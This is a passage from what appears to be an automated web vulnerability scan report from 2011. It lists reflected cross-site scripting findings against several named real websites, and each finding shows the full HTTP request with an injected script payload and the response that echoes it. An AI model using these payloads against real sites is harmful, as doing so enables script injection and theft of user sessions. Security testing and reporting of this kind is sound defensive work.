User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:26 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n3), ms iad-agg-n3 ( sfo-agg-n36), ms sfo-agg-n36 ( origin)
ETag: "921c1eecd508a1cdcf54fe736b0295a6-275310"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:26 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:26 GMT
Connection: keep-alive
Content-Length: 275310

/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister */
/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License

...[SNIP]...

1.105. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c442d<script>alert(1)</script>e464d1587a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c442d<script>alert(1)</script>e464d1587a7=1 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:51 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n28), ms iad-agg-n28 ( sfo-agg-n44), ms sfo-agg-n44 ( origin)
ETag: "9619eb07dd52d1bb379fc8198f8514d7-86888"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:52 GMT
Age: 3
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:55 GMT
Connection: keep-alive
Content-Length: 86888

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c442d<script>alert(1)</script>e464d1587a7=1 */
@charset "utf-8";
/* CSS Document */

/* Reset styles for browser compatibility */
body, th, td, p, div {
   font-family:Arial, Helvetica, sans-serif;
}
html,ul,ol,li,h1,h2,h3,h4,h5,h6,
pre
...[SNIP]...

1.106. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload e7e46*/alert(1)//5ca6254cbb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:45 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n25), ms iad-agg-n25 ( sfo-agg-n22), ms sfo-agg-n22 ( origin>CONN)
ETag: "36d7fe9bef85681434af3bae951e1aa9-277034"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:46 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:45 GMT
Connection: keep-alive
Content-Length: 277034

/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1 */
/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 200
...[SNIP]...

1.107. http://common.onset.freedom.com/tools/load.php [scode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the scode request parameter is copied into the HTML document as plain text between tags. The payload 3df07<script>alert(1)</script>35144f36647 was submitted in the scode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister3df07<script>alert(1)</script>35144f36647 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:37 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n3), ms iad-agg-n3 ( sfo-agg-n14), ms sfo-agg-n14 ( origin)
ETag: "2ca22c76c464a94c8b23b21959b5333c-22441"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:37 GMT
Age: 0
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:37 GMT
Connection: keep-alive
Content-Length: 22441

/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister3df07<script>alert(1)</script>35144f36647 */
/*generic freedom site styles, take layout.css styles and define fonts, background images, etc */

/* define page areas */
body {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 100%;
...[SNIP]...

1.108. http://common.onset.freedom.com/tools/load.php [scode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://common.onset.freedom.com
Path:   /tools/load.php

Issue detail

The value of the scode request parameter is copied into a JavaScript inline comment. The payload 4af35*/alert(1)//4781d05c682 was submitted in the scode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister4af35*/alert(1)//4781d05c682 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:31 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n18), ms iad-agg-n18 ( sfo-agg-n52), ms sfo-agg-n52 ( origin)
ETag: "c2f050b674a3c750a989f83312ba3a06-4132"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:31 GMT
Connection: keep-alive
Content-Length: 4132

/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister4af35*/alert(1)//4781d05c682 */
/*
* jQuery ifixpng plugin
* (previously known as pngfix)
* Version 2.1 (23/04/2008)
* @requires jQuery v1.1.3 or above
*
* Examples at: http://jquery.khurshid.com
* Copyright (c) 20
...[SNIP]...

1.109. http://da.newstogram.com/hg.php [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fc1bd<script>alert(1)</script>f099d0b47bf was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completedfc1bd<script>alert(1)</script>f099d0b47bf HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 03 Feb 2011 18:54:26 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27; expires=Fri, 03-Feb-2012 18:54:26 GMT; domain=.newstogram.com
Content-Length: 164

Newstogram.completedfc1bd<script>alert(1)</script>f099d0b47bf({"Histogram":{"status":"error","uid":"76DB7C80-A3AF-45F2-82C2-8381798839F3'","ip":"173.193.214.243"}})

1.110. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1a69a<script>alert(1)</script>840e96d1dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.compl/1a69a<script>alert(1)</script>840e96d1dd4eted HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 03 Feb 2011 18:54:28 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27; expires=Fri, 03-Feb-2012 18:54:28 GMT; domain=.newstogram.com
Content-Length: 165

Newstogram.compl/1a69a<script>alert(1)</script>840e96d1dd4eted({"Histogram":{"status":"error","uid":"76DB7C80-A3AF-45F2-82C2-8381798839F3'","ip":"173.193.214.243"}})

1.111. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daffodil.acsevents.org
Path:   /site/TR/DaffodilDays/DDFY10Pennsylvania

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b337"><script>alert(1)</script>ef6b6cded06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/TR/DaffodilDays6b337"><script>alert(1)</script>ef6b6cded06/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:48 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=cf8yj71601.app324b; domain=.acsevents.org; path=/
Keep-Alive: timeout=8, max=462
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31955

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<base href="http://daffodil.acsevents.org/site/" />


<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<form name="TrEventSearchForm" id="TrEventSearchForm" action="http://daffodil.acsevents.org/site/TR/DaffodilDays6b337"><script>alert(1)</script>ef6b6cded06/DDFY10Pennsylvania?pg=entry&fr_id=26972" method="post">
...[SNIP]...

1.112. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daffodil.acsevents.org
Path:   /site/TR/DaffodilDays/DDFY10Pennsylvania

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b20"><script>alert(1)</script>f315c83fe6a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/TR/DaffodilDays/DDFY10Pennsylvania20b20"><script>alert(1)</script>f315c83fe6a?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:49 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=ca1fem1602.app312b; domain=.acsevents.org; path=/
Keep-Alive: timeout=8, max=489
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31955

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<base href="http://daffodil.acsevents.org/site/" />


<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<form name="TrEventSearchForm" id="TrEventSearchForm" action="http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania20b20"><script>alert(1)</script>f315c83fe6a?pg=entry&fr_id=26972" method="post">
...[SNIP]...

1.113. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daffodil.acsevents.org
Path:   /site/TR/DaffodilDays/DDFY10Pennsylvania

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ab"><script>alert(1)</script>a53cb358e62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972&ab6ab"><script>alert(1)</script>a53cb358e62=1 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:04:47 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=jgb0xc15z1.app314b; domain=.acsevents.org; path=/
Keep-Alive: timeout=8, max=461
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31972

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<base href="http://daffodil.acsevents.org/site/" />


<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<form name="TrEventSearchForm" id="TrEventSearchForm" action="http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972&ab6ab"><script>alert(1)</script>a53cb358e62=1" method="post">
...[SNIP]...

1.114. http://ds.addthis.com/red/psi/sites/mapserver.superpages.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/mapserver.superpages.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 59e02<script>alert(1)</script>41e145e4da2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/mapserver.superpages.com/p.json?callback=_ate.ad.hpr59e02<script>alert(1)</script>41e145e4da2&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fmapserver.superpages.com%2Fmapbasedsearch%2F%3F%26SRC%3Dcomlocal1a%26C%3Dbanks415ee%2522%253balert(1)%2F%2F7f39f412a8d%26L%3D19101%26CS%3DL%26MCBP%3Dtrue%26C%3DBanks%26STYPE%3DS%26PS%3D15%26search%3DFind%2BIt&ref=http%3A%2F%2Fburp%2Fshow%2F52&wzilxl HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 463
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 03 Feb 2011 18:54:36 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 05 Mar 2011 18:54:36 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296759276.60|1296659685.66; Domain=.addthis.com; Expires=Sat, 02-Feb-2013 14:10:54 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 03 Feb 2011 18:54:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 18:54:37 GMT
Connection: close

_ate.ad.hpr59e02<script>alert(1)</script>41e145e4da2({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fmapserver.superpages.com%2fmapbasedsearch%2f%3f%26SRC%3dcomlocal1a%26C%3
...[SNIP]...

1.115. http://easycheckingbanking.com/ [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://easycheckingbanking.com
Path:   /

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6ebd"><script>alert(1)</script>7daaa4423aa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=f6ebd"><script>alert(1)</script>7daaa4423aa HTTP/1.1
Host: easycheckingbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:35 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=dae8755f44e9e7e1e70452e10de4ca1b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 697
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://onlinecheckingservices.com/?keyword=f6ebd"><script>alert(1)</script>7daaa4423aa" "frameborder=0"/>
...[SNIP]...

1.116. http://easycheckingbanking.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://easycheckingbanking.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2176b"><script>alert(1)</script>81ec6443090 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=online%20banking?adid=640302&2176b"><script>alert(1)</script>81ec6443090=1 HTTP/1.1
Host: easycheckingbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=6ff48bba9adbd319bbc6900ffd56092c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 728
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://onlinecheckingservice.info/?keyword=online%20banking?adid=640302&2176b"><script>alert(1)</script>81ec6443090=1" "frameborder=0"/>
...[SNIP]...

1.117. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://economy.ocregister.com
Path:   /2011/02/03/o-c-in-top-three-for-job-growth/48434/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d90"><script>alert(1)</script>0368ae71355 was submitted in the REST URL parameter 5. This input was echoed as f5d90\"><script>alert(1)</script>0368ae71355 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/o-c-in-top-three-for-job-growth/48434f5d90"><script>alert(1)</script>0368ae71355/ HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:05:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:05:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Handling Hard Times - www.ocregister.com" href="http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434f5d90\"><script>alert(1)</script>0368ae71355/feed/" />
...[SNIP]...

1.118. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://economy.ocregister.com
Path:   /2011/02/03/o-c-in-top-three-for-job-growth/48434/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44f2c"><script>alert(1)</script>737289185c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44f2c\"><script>alert(1)</script>737289185c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/o-c-in-top-three-for-job-growth/48434/?44f2c"><script>alert(1)</script>737289185c2=1 HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
